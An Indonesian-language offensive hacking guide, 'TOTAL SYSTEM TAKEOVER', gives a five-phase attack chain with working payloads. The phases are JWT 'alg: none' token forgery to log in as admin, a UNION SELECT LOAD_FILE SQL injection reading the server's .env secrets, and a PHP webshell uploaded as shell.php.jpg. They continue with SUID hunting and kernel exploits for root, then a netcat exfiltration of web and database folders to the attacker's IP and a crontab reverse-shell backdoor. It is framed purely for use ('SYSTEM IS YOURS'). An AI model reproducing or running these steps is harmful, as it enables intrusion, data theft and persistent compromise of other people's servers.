TOTAL SYSTEM TAKEOVER

[PHASE 01] BROKEN AUTHENTICATION & TOKEN FORGERY

Tujuan: Masuk ke akun siapa pun tanpa password.

Teknik: Mencari JWT (JSON Web Token) yang lemah atau tidak terverifikasi.

# 1. Tangkap Token Bearer saat Login # 2. Cek apakah server memvalidasi signature. # 3. Ganti "alg": "HS256" menjadi "alg": "none" (None Algorithm Attack) # 4. Ganti isi payload: {"user": "admin", "role": "superuser"} # 5. Kirim kembali tanpa signature.

Hasil: Kamu login sebagai Admin Pusat tanpa perlu tahu password-nya.

[PHASE 02] MASSIVE DATA DUMPING (BEYOND SQLMAP)

Tujuan: Menguras seluruh isi harddisk database secara instan.

Teknik: Menggunakan In-Band SQLi untuk membaca file sistem.

# Gunakan fungsi 'LOAD_FILE' untuk membaca konfigurasi server ' UNION SELECT 1, LOAD_FILE('/var/www/html/.env'), 3, 4 -- # Jika tembus, kamu akan melihat: DB_PASSWORD=P@ssw0rd_Rahasia_Banget AWS_SECRET=AKIA...
[Image of a SQL injection vulnerability diagram showing data exfiltration via UNION SELECT]

[PHASE 03] GAINING SHELL (RCE VIA FILE UPLOAD)

Tujuan: Menjalankan perintah terminal Ubuntu langsung dari browser.

Teknik: Mem-bypass filter upload gambar untuk memasukkan Webshell.

# 1. Siapkan file: shell.php.jpg (Double Extension) # 2. Isi file: <?php system($_GET['cmd']); ?> # 3. Bypass Content-Type: image/jpeg # 4. Akses lewat browser: https://target.com/uploads/shell.php.jpg?cmd=ls -la

Hasil: Kamu punya kontrol penuh atas folder web server.

[PHASE 04] PRIVILEGE ESCALATION TO ROOT

Tujuan: Menjadi Penguasa Tertinggi (Root) di server Linux.

Teknik: Mencari celah Kernel atau SUID binary yang salah setting.

# Di dalam shell tadi, cek versi Linux: uname -a # Cari file dengan akses SUID: find / -perm -4000 -type f 2>/dev/null # Eksekusi exploit kernel (misal: DirtyPipe atau PwnKit) ./exploit_root whoami -> root
[Image of a privilege escalation attack flow from a low-privileged user to root]

[PHASE 05] DATA EXFILTRATION & PERSISTENCE

Tujuan: Mengirim data ke servermu dan membuat pintu belakang permanen.

# Kompres seluruh folder web dan database tar -cvf backup_total.tar /var/www/html /var/lib/mysql # Kirim ke servermu lewat Netcat: nc -w 3 [IP_KAMU] [PORT_KAMU] < backup_total.tar # Tanam Backdoor di Crontab (Jalan otomatis tiap jam) echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/[IP_KAMU]/4444 0>&1'" >> /etc/crontab
TOTAL COMPROMISE: SYSTEM IS YOURS.